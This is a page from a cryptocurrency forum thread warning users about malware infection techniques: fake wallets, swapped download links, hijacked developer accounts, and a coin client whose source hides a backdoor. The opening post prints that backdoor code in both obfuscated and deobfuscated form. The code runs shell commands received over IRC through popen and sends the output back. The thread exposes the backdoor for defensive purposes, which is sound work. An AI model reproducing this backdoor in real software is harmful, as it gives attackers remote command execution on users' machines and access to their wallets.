Pages:
Author

Topic: Beware of Increasingly Sophisticated Malware Infection Attempts - page 46. (Read 860900 times)

legendary
Activity: 1624
Merit: 1001
All cryptos are FIAT digital currency. Do not use.
In my case, IE11 was completely locked up and I had to be fast with the "end process" clicks.

I've never had my browser hijacked like this. That is unless we count AMD's user surveys they keep imposing on us after a driver install. lol
newbie
Activity: 33
Merit: 0
The multifaucet.tk wallet search would redirect you to a third-party ad network. Subsequently, the ad network would redirect you to the destination page -- which, in this case, is the result of the wallet search. I'm in California; the ad network being shown is adf.ly. Depending on your geographic location, you may get a different ad network. These third-party sites generate revenue for multifaucet upon every ad view. This is paid for by the ad publisher. However, multifaucet has no control of what ads are being shown. To maximize their profits, ad publishers may show ads that may lead to malware, which promises higher margins than conventional ads.

In my case, I encountered the following page:

https://i.imgur.com/xzj6fWl.png
legendary
Activity: 1624
Merit: 1001
All cryptos are FIAT digital currency. Do not use.
Any thoughts ?

EDIT
SPR, ORB and at least one or two other coins are using this faucet/ block explorer site.

BE VARY WARY OF THE MULTIFAUCET BLOCK EXPLORER !

I searched an for an address and was left with having to fight virus scan pop ups for a few minutes.






sr. member
Activity: 439
Merit: 288
I'd like to add the bitcoinwisdomapp.com to the blacklist. It's a keylogger behind it.
sr. member
Activity: 264
Merit: 250
Could you please post the coin's name and maybe others that you may have found ?

This is found in the "Lucky7coin" source code, as linked above.
newbie
Activity: 33
Merit: 0
hero member
Activity: 550
Merit: 501
I was checking some IRC bootstrap connections and found some additional info.

Kinda looks ripe for the picking by a exploit.

https://bitcointalk.org/index.php?topic=943519.new#new

 Undecided
sr. member
Activity: 252
Merit: 250
correct me if im wrong but maleware its generecly for executables in windows no? i mean the wallets are but its not kaspersky enough?
if not why do we need to protect from the case of reteiving passorws from the users and other stuff from enven pen drives with wallets (including the common coins ones) like doge ltc btc and a few more.
member
Activity: 108
Merit: 10
Could you please post the coin's name and maybe others that you may have found ?
legendary
Activity: 2058
Merit: 1452
In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
CFree(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
}
}
here is the source code with macros resolved:
Code:
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
pclose(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
}
}
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.
Pages:
Jump to: